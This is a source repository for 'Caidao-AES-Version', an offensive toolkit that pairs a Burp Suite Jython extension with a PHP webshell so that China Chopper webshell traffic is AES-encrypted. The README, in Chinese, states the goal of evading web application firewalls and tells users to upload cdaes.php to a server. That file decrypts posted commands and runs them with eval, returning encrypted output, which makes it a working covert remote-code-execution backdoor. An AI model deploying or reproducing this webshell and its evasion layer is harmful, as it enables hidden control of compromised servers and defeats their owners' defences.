├── BurpSuite-Caidao-Extender
├── CaidaoExt.py
├── exceptions_fix$py.class
├── exceptions_fix.py
├── library$py.class
└── library.py
├── BurpSuite-jython
└── Jython-standalone-Jar-file.txt
├── Caidao-AES-PHP
├── cd.php
└── cdaes.php
├── LICENSE
├── Pic
├── 20190113102334.png
├── 20190113104858.png
├── 20190113104939.png
├── 20190113135843.png
├── 20190113135844.png
├── 20190113141051.png
├── 20190113141052.png
├── 20190113141221-aes.png
├── 20190113141300-aes.png
├── 20190113141720-cd1.png
├── 20190113141745-cd2.png
├── 20190113141805-cd3.png
├── 20190113141821-cd4.png
├── 20190113141856-cd-ok.png
├── 20190119121825.jpg
└── 20190119121836.jpg
└── README.md
/BurpSuite-Caidao-Extender/CaidaoExt.py:
--------------------------------------------------------------------------------
1 | from burp import IBurpExtender
2 | from burp import IMessageEditorTabFactory
3 | from burp import IMessageEditorTab
4 | from burp import IParameter
5 | from burp import IHttpListener
6 |
7 | # Parsia: modified "custom editor tab" https://github.com/PortSwigger/example-custom-editor-tab/.
8 | # Parsia: for burp-exceptions - see https://github.com/securityMB/burp-exceptions
9 |
10 | from exceptions_fix import FixBurpExceptions
11 | import sys
12 |
13 | from library import *
14 |
15 | class BurpExtender(IBurpExtender, IMessageEditorTabFactory, IHttpListener):
16 |
17 | #
18 | # implement IBurpExtender
19 | #
20 |
21 | def registerExtenderCallbacks(self, callbacks):
22 | # keep a reference to our callbacks object
23 | self._callbacks = callbacks
24 |
25 | self._helpers = callbacks.getHelpers()
26 | callbacks.setExtensionName("Caidao Crypto(AES)")
27 |
28 | # register ourselves as a message editor tab factory
29 | callbacks.registerMessageEditorTabFactory(self)
30 |
31 | # add http listener
32 | callbacks.registerHttpListener(self)
33 |
34 | # Parsia: for burp-exceptions
35 | sys.stdout = callbacks.getStdout()
36 |
37 | print("Caidao Crypto(AES) is ready")
38 |
39 | #
40 | # implement IMessageEditorTabFactory
41 | #
42 |
43 | def createNewInstance(self, controller, editable):
44 | # create a new instance of our custom editor tab
45 | return CryptoTab(self, controller, editable)
46 |
47 | #
48 | # implement IHttpListener
49 | #
50 | def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
51 | key = "0123456789012345"
52 | iv = "9876543210987654"
53 |
54 | # only process requests
55 | if messageIsRequest:
56 |
57 | info = getInfo(messageInfo, messageIsRequest, self._helpers)
58 | headers = info.getHeaders()
59 |
60 | # get the body
61 | body = getBody(messageInfo.getRequest(), messageIsRequest, self._helpers)
62 |
63 | # encrypt the caidao post body
64 | encryptedBody = encryptJython(body, key, iv)
65 |
66 | newMSG = self._helpers.buildHttpMessage(headers, encryptedBody)
67 | messageInfo.setRequest(newMSG)
68 | else:
69 |
70 | info = getInfo(messageInfo.getResponse(), messageIsRequest, self._helpers)
71 | headers = info.getHeaders()
72 |
73 | # get the body
74 | body = getBody(messageInfo.getResponse(), messageIsRequest, self._helpers)
75 |
76 | # decrypt the aes body
77 | decryptedBody = decryptJython(body, key, iv)
78 |
79 | newMSG = self._helpers.buildHttpMessage(headers, decryptedBody)
80 | messageInfo.setResponse(newMSG)
81 |
82 | #
83 | # class implementing IMessageEditorTab
84 | #
85 |
86 | class CryptoTab(IMessageEditorTab):
87 | def __init__(self, extender, controller, editable):
88 | self._extender = extender
89 | self._editable = editable
90 | # Parsia: Burp helpers object
91 | self.helpers = extender._helpers
92 |
93 | # create an instance of Burp's text editor, to display our decrypted data
94 | self._txtInput = extender._callbacks.createTextEditor()
95 | self._txtInput.setEditable(editable)
96 |
97 | #
98 | # implement IMessageEditorTab
99 | #
100 |
101 | def getTabCaption(self):
102 | # Parsia: tab title
103 | return "Caidao Crypto(AES)"
104 |
105 | def getUiComponent(self):
106 | return self._txtInput.getComponent()
107 |
108 | def isEnabled(self, content, isRequest):
109 | return True
110 |
111 | def isModified(self):
112 | return self._txtInput.isTextModified()
113 |
114 | def getSelectedData(self):
115 | return self._txtInput.getSelectedText()
116 |
117 | def setMessage(self, content, isRequest):
118 | if content is None:
119 | # clear our display
120 | self._txtInput.setText(None)
121 | self._txtInput.setEditable(False)
122 |
123 | # Parsia: if tab has content
124 | else:
125 | # get the body
126 | body = getBody(content, isRequest, self.helpers)
127 | # decrypt does the base64 decoding so the extension does not have to
128 | key = "0123456789012345"
129 | iv = "9876543210987654"
130 | decryptedBody = encryptJython(body, key, iv)
131 | # set the body as text of message box
132 | self._txtInput.setText(decryptedBody)
133 | # this keeps the message box edit value to whatever it was
134 | self._txtInput.setEditable(self._editable)
135 |
136 | # remember the displayed content
137 | self._currentMessage = content
138 |
139 | def getMessage(self):
140 | # determine whether the user modified the data
141 | if self._txtInput.isTextModified():
142 | # Parsia: if text has changed, encode it and make it the new body of the message
143 | modified = self._txtInput.getText()
144 | # encrypt and decrypt do the base64 transformation
145 | key = "0123456789012345"
146 | iv = "9876543210987654"
147 | encryptedModified = encryptJython(modified, key, iv)
148 |
149 | # Parsia: create a new message with the new body and return that
150 | info = getInfo(self._currentMessage, True, self.helpers)
151 | headers = info.getHeaders()
152 | return self.helpers.buildHttpMessage(headers, encryptedModified)
153 | else:
154 | # Parsia: if nothing is modified, return the current message so nothing gets updated
155 | return self._currentMessage
156 |
157 | # Parsia: for burp-exceptions
158 | FixBurpExceptions()
159 |
--------------------------------------------------------------------------------
/BurpSuite-Caidao-Extender/exceptions_fix$py.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ekgg/Caidao-AES-Version/4a52f0ee7c0d8b5676b2af7d5bba48ff8906d105/BurpSuite-Caidao-Extender/exceptions_fix$py.class
--------------------------------------------------------------------------------
/BurpSuite-Caidao-Extender/exceptions_fix.py:
--------------------------------------------------------------------------------
1 | ## Burp Exceptions Fix magic code
2 | import sys, functools, inspect, traceback
3 |
4 | def decorate_function(original_function):
5 | @functools.wraps(original_function)
6 | def decorated_function(*args, **kwargs):
7 | try:
8 | return original_function(*args, **kwargs)
9 | except:
10 | sys.stdout.write('\n\n*** PYTHON EXCEPTION\n')
11 | traceback.print_exc(file=sys.stdout)
12 | raise
13 | return decorated_function
14 |
15 | def FixBurpExceptionsForClass(cls):
16 | for name, method in inspect.getmembers(cls, inspect.ismethod):
17 | setattr(cls, name, decorate_function(method))
18 | return cls
19 |
20 | def FixBurpExceptions():
21 | for name, cls in inspect.getmembers(sys.modules['__main__'], predicate=inspect.isclass):
22 | FixBurpExceptionsForClass(cls)
23 |
24 |
25 |
--------------------------------------------------------------------------------
/BurpSuite-Caidao-Extender/library$py.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ekgg/Caidao-AES-Version/4a52f0ee7c0d8b5676b2af7d5bba48ff8906d105/BurpSuite-Caidao-Extender/library$py.class
--------------------------------------------------------------------------------
/BurpSuite-Caidao-Extender/library.py:
--------------------------------------------------------------------------------
1 | # 3-jython/library.py
2 |
3 | from subprocess import Popen, PIPE
4 | import sys
5 |
6 | # Jython imports
7 | from javax.crypto import Cipher
8 | from javax.crypto.spec import IvParameterSpec
9 | from javax.crypto.spec import SecretKeySpec
10 |
11 | from java.util import Base64
12 |
13 | # getInfo processes the request/response and returns info
14 | def getInfo(content, isRequest, helpers):
15 | if isRequest:
16 | return helpers.analyzeRequest(content)
17 | else:
18 | return helpers.analyzeResponse(content)
19 |
20 | # getBody returns the body of a request/response
21 | def getBody(content, isRequest, helpers):
22 | info = getInfo(content, isRequest, helpers)
23 | return content[info.getBodyOffset():]
24 |
25 | # setBody replaces the body of request/response with newBody and returns the result
26 | # should I check for sizes or does Python automatically increase the array size?
27 | def setBody(newBody, content, isRequest, helpers):
28 | info = getInfo(content, isRequest, helpers)
29 | content[info.getBodyOffset():] = newBody
30 | return content
31 |
32 | # decode64 decodes a base64 encoded byte array and returns another byte array
33 | def decode64(encoded, helpers):
34 | return helpers.base64Decode(encoded)
35 |
36 | # encode64 encodes a byte array and returns a base64 encoded byte array
37 | def encode64(plaintext, helpers):
38 | return helpers.base64Encode(plaintext)
39 |
40 | # runExternal executes an external python script with two arguments and returns the output
41 | def runExternal(script, arg1, arg2):
42 | proc = Popen(["python", script, arg1, arg2], stdout=PIPE, stderr=PIPE)
43 | output = proc.stdout.read()
44 | proc.stdout.close()
45 | err = proc.stderr.read()
46 | proc.stderr.close()
47 | sys.stdout.write(err)
48 | return output
49 |
50 | # encrypt uses the external prototype to encrypt the payload
51 | def encrypt(payload):
52 | return runExternal("crypto.py", "encrypt", payload.tostring())
53 |
54 | # decrypt uses the external prototype to decrypt the payload
55 | def decrypt(payload):
56 | return runExternal("crypto.py", "decrypt", payload.tostring())
57 |
58 | # encryptJython uses javax.crypto.Cipher to encrypt payload with key/iv
59 | # using AES/CFB/NOPADDING
60 | def encryptJython(payload, key, iv):
61 | aesKey = SecretKeySpec(key, "AES")
62 | aesIV = IvParameterSpec(iv)
63 | cipher = Cipher.getInstance("AES/CFB/NOPADDING")
64 | cipher.init(Cipher.ENCRYPT_MODE, aesKey, aesIV)
65 | encrypted = cipher.doFinal(payload)
66 | return Base64.getEncoder().encode(encrypted)
67 |
68 | # decryptJython uses javax.crypto.Cipher to decrypt payload with key/iv
69 | # using AES/CFB/NOPADDING
70 | def decryptJython(payload, key, iv):
71 | decoded = Base64.getDecoder().decode(payload)
72 | aesKey = SecretKeySpec(key, "AES")
73 | aesIV = IvParameterSpec(iv)
74 | cipher = Cipher.getInstance("AES/CFB/NOPADDING")
75 | cipher.init(Cipher.DECRYPT_MODE, aesKey, aesIV)
76 | return cipher.doFinal(decoded)
77 |
--------------------------------------------------------------------------------
/BurpSuite-jython/Jython-standalone-Jar-file.txt:
--------------------------------------------------------------------------------
1 | jython-standalone-2.7.0.jar
2 |
3 | http://www.jython.org/downloads.html
4 | Download Jython 2.7.0 - Standalone Jar : For embedding Jython in Java applications
--------------------------------------------------------------------------------
/Caidao-AES-PHP/cd.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Caidao-AES-PHP/cdaes.php:
--------------------------------------------------------------------------------
1 | secret_key = isset($key) ? $key : exit("key is empty");
18 |
19 | $this->method = $method;
20 |
21 | $this->iv = $iv;
22 |
23 | $this->options = $options;
24 | }
25 |
26 | public function encrypt($data)
27 | {
28 | return openssl_encrypt($data, $this->method, $this->secret_key, $this->options, $this->iv);
29 | }
30 | public function decrypt($data)
31 | {
32 | return openssl_decrypt($data, $this->method, $this->secret_key, $this->options, $this->iv);
33 | }
34 | }
35 |
36 | function test_aes()
37 | {
38 | global $mykey,$myiv,$mymethod,$mymsg;
39 | $aes = new OpenSSLAES($mykey,$mymethod,$myiv);
40 |
41 | $encrypted = $aes->encrypt($mymsg);
42 | echo 'Source Str:'.$mymsg.'
Encrypted String::', $encrypted, '
';
43 |
44 | $decrypted = $aes->decrypt($encrypted);
45 | echo 'Encrypted String:', $encrypted, '
Decrypted String:', $decrypted;
46 | }
47 |
48 | function getCDPostMsg($msg)
49 | {
50 | $cdmsg = urldecode($msg);
51 | $cdpos = strpos($cdmsg,'=');
52 | if($cdpos!== false)
53 | {
54 | $cdmsg = substr($cdmsg,$cdpos+1);
55 | return $cdmsg;
56 | }
57 | else
58 | return $cdmsg;
59 | }
60 |
61 | //test_aes();
62 | //echo "
";
63 |
64 | $eas_msg = file_get_contents("php://input");
65 | $aes = new OpenSSLAES($mykey,$mymethod,$myiv);
66 | $decrptContent = $aes->decrypt($eas_msg);
67 |
68 | //echo $eas_msg."
";
69 | //echo $decrptContent."
";
70 |
71 | $arr=explode('&',$decrptContent);
72 | //var_dump($arr);
73 | $arrlength=count($arr);
74 | if($arrlength <=1)
75 | {
76 | die();//error caidao post
77 | }
78 |
79 | $_POST = array();
80 | $_POST['c'] = getCDPostMsg($arr[0]);
81 | $_POST['z0'] = getCDPostMsg($arr[1]);
82 |
83 | if($arrlength >=3)
84 | {
85 | $_POST['z1'] = getCDPostMsg($arr[2]);
86 | }
87 |
88 | if($arrlength >=4)
89 | {
90 | $_POST['z2'] = getCDPostMsg($arr[3]);
91 | }
92 |
93 | //var_dump($_POST);
94 |
95 |
96 | //@eval($_POST['c']);
97 | //die();
98 |
99 | $my_echomsg = "";
100 | function myecho($msg)
101 | {
102 | global $my_echomsg;
103 | $my_echomsg = $my_echomsg.$msg;
104 | }
105 | function mydie()
106 | {
107 |
108 | }
109 |
110 | $cd_z0 = base64_decode($_POST['z0']);
111 |
112 | //echo $cd_z0;
113 | $cd_z0 = str_replace("echo(","myecho(",$cd_z0);
114 | $cd_z0 = str_replace('echo $M.$L;','myecho($M.$L);',$cd_z0);
115 | $cd_z0 = str_replace("die()","mydie()",$cd_z0);
116 |
117 | //echo $cd_z0;
118 | //die();
119 |
120 | @eval($cd_z0);
121 |
122 | //encrypt the result to caicao
123 | $aesContent = $aes->encrypt($my_echomsg);
124 | echo($aesContent);
125 | die();
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2019 ekgg
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/Pic/20190113102334.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ekgg/Caidao-AES-Version/4a52f0ee7c0d8b5676b2af7d5bba48ff8906d105/Pic/20190113102334.png
--------------------------------------------------------------------------------
/Pic/20190113104858.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ekgg/Caidao-AES-Version/4a52f0ee7c0d8b5676b2af7d5bba48ff8906d105/Pic/20190113104858.png
--------------------------------------------------------------------------------
/Pic/20190113104939.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ekgg/Caidao-AES-Version/4a52f0ee7c0d8b5676b2af7d5bba48ff8906d105/Pic/20190113104939.png
--------------------------------------------------------------------------------
/Pic/20190113135843.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ekgg/Caidao-AES-Version/4a52f0ee7c0d8b5676b2af7d5bba48ff8906d105/Pic/20190113135843.png
--------------------------------------------------------------------------------
/Pic/20190113135844.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ekgg/Caidao-AES-Version/4a52f0ee7c0d8b5676b2af7d5bba48ff8906d105/Pic/20190113135844.png
--------------------------------------------------------------------------------
/Pic/20190113141051.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ekgg/Caidao-AES-Version/4a52f0ee7c0d8b5676b2af7d5bba48ff8906d105/Pic/20190113141051.png
--------------------------------------------------------------------------------
/Pic/20190113141052.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ekgg/Caidao-AES-Version/4a52f0ee7c0d8b5676b2af7d5bba48ff8906d105/Pic/20190113141052.png
--------------------------------------------------------------------------------
/Pic/20190113141221-aes.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ekgg/Caidao-AES-Version/4a52f0ee7c0d8b5676b2af7d5bba48ff8906d105/Pic/20190113141221-aes.png
--------------------------------------------------------------------------------
/Pic/20190113141300-aes.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ekgg/Caidao-AES-Version/4a52f0ee7c0d8b5676b2af7d5bba48ff8906d105/Pic/20190113141300-aes.png
--------------------------------------------------------------------------------
/Pic/20190113141720-cd1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ekgg/Caidao-AES-Version/4a52f0ee7c0d8b5676b2af7d5bba48ff8906d105/Pic/20190113141720-cd1.png
--------------------------------------------------------------------------------
/Pic/20190113141745-cd2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ekgg/Caidao-AES-Version/4a52f0ee7c0d8b5676b2af7d5bba48ff8906d105/Pic/20190113141745-cd2.png
--------------------------------------------------------------------------------
/Pic/20190113141805-cd3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ekgg/Caidao-AES-Version/4a52f0ee7c0d8b5676b2af7d5bba48ff8906d105/Pic/20190113141805-cd3.png
--------------------------------------------------------------------------------
/Pic/20190113141821-cd4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ekgg/Caidao-AES-Version/4a52f0ee7c0d8b5676b2af7d5bba48ff8906d105/Pic/20190113141821-cd4.png
--------------------------------------------------------------------------------
/Pic/20190113141856-cd-ok.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ekgg/Caidao-AES-Version/4a52f0ee7c0d8b5676b2af7d5bba48ff8906d105/Pic/20190113141856-cd-ok.png
--------------------------------------------------------------------------------
/Pic/20190119121825.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ekgg/Caidao-AES-Version/4a52f0ee7c0d8b5676b2af7d5bba48ff8906d105/Pic/20190119121825.jpg
--------------------------------------------------------------------------------
/Pic/20190119121836.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ekgg/Caidao-AES-Version/4a52f0ee7c0d8b5676b2af7d5bba48ff8906d105/Pic/20190119121836.jpg
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Caidao-AES-Version
2 | 用AES算法透明加密菜刀的http数据流
3 |
4 | ## 功能介绍
5 | Caidao.exe与Web服务器的http交互是明文,容易被分析和拦截。
6 | 
7 | 偶然看到《“冰蝎”动态二进制加密网站管理客户端》https://github.com/rebeyond/Behinder, 这个套路不错哈;
8 |
9 | 习惯了用菜刀, 于是决定给菜刀做一个Burp的Python AES加密插件,自动加解密caidao.exe与服务器端交互的http数据流,
10 | 进而达到过WAF的目的。
11 | 
12 |
13 | ## 使用方式
14 |
15 | 1. git clone https://github.com/ekgg/Caidao-AES-Version.git
16 | 2. 下载安装Burp Suite Community Edition v1.7.36 https://portswigger.net/burp/communitydownload (其它版本未测试,应该问题不大)
17 | 3. 下载Jython 2.7.0 - Standalone Jar http://www.jython.org/downloads.html
18 | 4. 启动Burp,配置Extender的选项,添加python运行环境
19 | 
20 | 5. 在Burp Extensions中,添加并启用Caidao Crypto(AES)的python脚本
21 | .\Caidao-AES-Version\BurpSuite-Caidao-Extender\CaidaoExt.py
22 | 
23 | 6. 在Intenet选项中,设置系统代理为Burp监听的 127.0.0.1:8080
24 | 7. 将修改过的\Caidao-AES-Version\Caidao-AES-PHP\cdaes.php上传到服务器端
25 | 8. 启动caidao.exe,找开服务器端的cdaes.php地址,验证是否成功进入管理界面
26 | 
27 | 9. 可在Wireshark中观察是否已经加密了http数据流
28 | 
29 | 10. 在Burp中,可以查看自动加解密http post的数据流
30 | 
31 |
32 | ## 注意事项
33 | 1.PHP连接有问题?
34 |
35 | 因为采用了aes加密,请确认PHP是否开启了OpenSSL扩展,可通过echo var_dump(function_exists("openssl_encrypt"));是否为true来判断。
36 |
37 | 2.有Java, .Net版本的webshell吗?
38 | 暂时还没有空写。
39 |
40 | 3.我怎么运行不起来?
41 | 请将你的测试环境提交到isues, 上面列出的软件(caidao,burp,jython),我没有测试完所有有的版本。
42 | 推荐你用我列出的版本来测试:
43 |
44 | ```txt
45 | caidao-20141213
46 | Burp Suite Community Edition v1.7.36
47 | jython-standalone-2.7.0.jar
48 | ```
49 |
50 | ## AES默认的加密key
51 | 在python和php脚本用的是一个简单的密码,请自行修改
52 |
53 | ```php
54 | $mykey = "0123456789012345";
55 | $myiv = "9876543210987654";
56 | $mymethod = 'AES-128-CFB';
57 | ```
58 |
59 | ## 参考与感谢
60 | ```txt
61 | http://www.4hou.com/technology/15501.html
62 | https://github.com/raddyfiy/caidao-official-version
63 | https://github.com/rebeyond/Behinder
64 | https://github.com/PortSwigger/example-custom-editor-tab/.
65 | https://github.com/securityMB/burp-exceptions
66 | https://github.com/PortSwigger/example-traffic-redirector/tree/master/python
67 | https://github.com/parsiya/Parsia-Code/tree/master/python-burp-crypto
68 | ```
69 |
--------------------------------------------------------------------------------